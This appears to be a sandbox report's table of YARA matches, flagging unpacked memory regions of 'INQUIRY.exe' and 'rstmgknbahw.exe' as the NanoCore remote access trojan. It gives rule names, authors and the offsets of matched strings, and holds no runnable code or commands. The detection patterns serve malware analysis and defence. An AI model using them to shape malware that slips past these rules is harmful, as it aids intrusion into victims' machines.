2.0.INQUIRY.exe.415058.10.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
2.2.INQUIRY.exe.39adee9.7.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost
2.2.INQUIRY.exe.39adee9.7.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost
2.2.INQUIRY.exe.39adee9.7.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.rstmgknbahw.exe.6d8d50.2.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.2.rstmgknbahw.exe.6d8d50.2.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
4.2.rstmgknbahw.exe.6d8d50.2.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.rstmgknbahw.exe.6d8d50.2.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
4.2.rstmgknbahw.exe.28f68dc.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
4.2.rstmgknbahw.exe.28f68dc.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
6.1.rstmgknbahw.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
6.1.rstmgknbahw.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
6.1.rstmgknbahw.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.1.rstmgknbahw.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
5.2.rstmgknbahw.exe.2411458.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
5.2.rstmgknbahw.exe.2411458.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
5.2.rstmgknbahw.exe.2411458.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.rstmgknbahw.exe.2411458.3.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
6.2.rstmgknbahw.exe.381bfde.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0x145e3:$x1: NanoCore.ClientPluginHost 0x2d08f:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost 0x14610:$x2: IClientNetworkHost 0x2d0bc:$x2: IClientNetworkHost
6.2.rstmgknbahw.exe.381bfde.5.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x145e3:$x2: NanoCore.ClientPluginHost 0x2d08f:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0x156be:$s4: PipeCreated 0x2e16a:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost 0x145fd:$s5: IClientLoggingHost 0x2d0a9:$s5: IClientLoggingHost
6.2.rstmgknbahw.exe.381bfde.5.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.2.rstmgknbahw.exe.381bfde.5.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xddf:$a: NanoCore 0xe38:$a: NanoCore 0xe75:$a: NanoCore 0xeee:$a: NanoCore 0x14599:$a: NanoCore 0x145ae:$a: NanoCore 0x145e3:$a: NanoCore 0x2d045:$a: NanoCore 0x2d05a:$a: NanoCore 0x2d08f:$a: NanoCore 0xe41:$b: ClientPlugin 0xe7e:$b: ClientPlugin 0x177c:$b: ClientPlugin 0x1789:$b: ClientPlugin 0x14355:$b: ClientPlugin 0x14370:$b: ClientPlugin 0x143a0:$b: ClientPlugin 0x145b7:$b: ClientPlugin 0x145ec:$b: ClientPlugin 0x2ce01:$b: ClientPlugin 0x2ce1c:$b: ClientPlugin
2.2.INQUIRY.exe.415058.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
2.2.INQUIRY.exe.415058.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
2.2.INQUIRY.exe.415058.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
2.2.INQUIRY.exe.415058.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
4.2.rstmgknbahw.exe.415058.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.2.rstmgknbahw.exe.415058.1.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
4.2.rstmgknbahw.exe.415058.1.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.rstmgknbahw.exe.415058.1.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
6.0.rstmgknbahw.exe.400000.8.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
6.0.rstmgknbahw.exe.400000.8.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
6.0.rstmgknbahw.exe.400000.8.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.0.rstmgknbahw.exe.400000.8.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
2.2.INQUIRY.exe.24e0000.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
2.2.INQUIRY.exe.24e0000.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
2.2.INQUIRY.exe.24e0000.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
2.2.INQUIRY.exe.24e0000.3.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
4.1.rstmgknbahw.exe.415058.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.1.rstmgknbahw.exe.415058.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
4.1.rstmgknbahw.exe.415058.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.1.rstmgknbahw.exe.415058.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
4.0.rstmgknbahw.exe.400000.7.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.0.rstmgknbahw.exe.400000.7.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
4.0.rstmgknbahw.exe.400000.7.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.0.rstmgknbahw.exe.400000.7.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
4.0.rstmgknbahw.exe.400000.5.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.0.rstmgknbahw.exe.400000.5.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
4.0.rstmgknbahw.exe.400000.5.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.0.rstmgknbahw.exe.400000.5.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
4.0.rstmgknbahw.exe.400000.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x85e5:$x1: NanoCore.ClientPluginHost 0x8622:$x2: IClientNetworkHost 0xc155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.0.rstmgknbahw.exe.400000.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x835d:$x1: NanoCore Client.exe 0x85e5:$x2: NanoCore.ClientPluginHost 0x9c1e:$s1: PluginCommand 0x9c12:$s2: FileCommand 0xaac3:$s3: PipeExists 0x1087a:$s4: PipeCreated 0x860f:$s5: IClientLoggingHost
4.0.rstmgknbahw.exe.400000.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.0.rstmgknbahw.exe.400000.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x834d:$a: NanoCore 0x835d:$a: NanoCore 0x8591:$a: NanoCore 0x85a5:$a: NanoCore 0x85e5:$a: NanoCore 0x83ac:$b: ClientPlugin 0x85ae:$b: ClientPlugin 0x85ee:$b: ClientPlugin 0x84d3:$c: ProjectData 0x8eda:$d: DESCrypto 0x108a6:$e: KeepAlive 0xe894:$g: LogClientMessage 0xaa8f:$i: get_Connected 0x9210:$j: #=q 0x9240:$j: #=q 0x925c:$j: #=q 0x928c:$j: #=q 0x92a8:$j: #=q 0x92c4:$j: #=q 0x92f4:$j: #=q 0x9310:$j: #=q
4.1.rstmgknbahw.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.1.rstmgknbahw.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
4.1.rstmgknbahw.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.1.rstmgknbahw.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
4.0.rstmgknbahw.exe.400000.11.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.0.rstmgknbahw.exe.400000.11.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
4.0.rstmgknbahw.exe.400000.11.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.0.rstmgknbahw.exe.400000.11.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
2.2.INQUIRY.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
2.2.INQUIRY.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
2.2.INQUIRY.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
2.2.INQUIRY.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
2.2.INQUIRY.exe.782558.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
2.2.INQUIRY.exe.782558.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
2.2.INQUIRY.exe.782558.2.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
2.2.INQUIRY.exe.782558.2.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x41028:$b: ClientPlugin 0x4d6de:$b: ClientPlugin 0x510b0:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q
4.0.rstmgknbahw.exe.415058.10.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.0.rstmgknbahw.exe.415058.10.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
4.0.rstmgknbahw.exe.415058.10.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.0.rstmgknbahw.exe.415058.10.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
1.2.INQUIRY.exe.22f1458.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
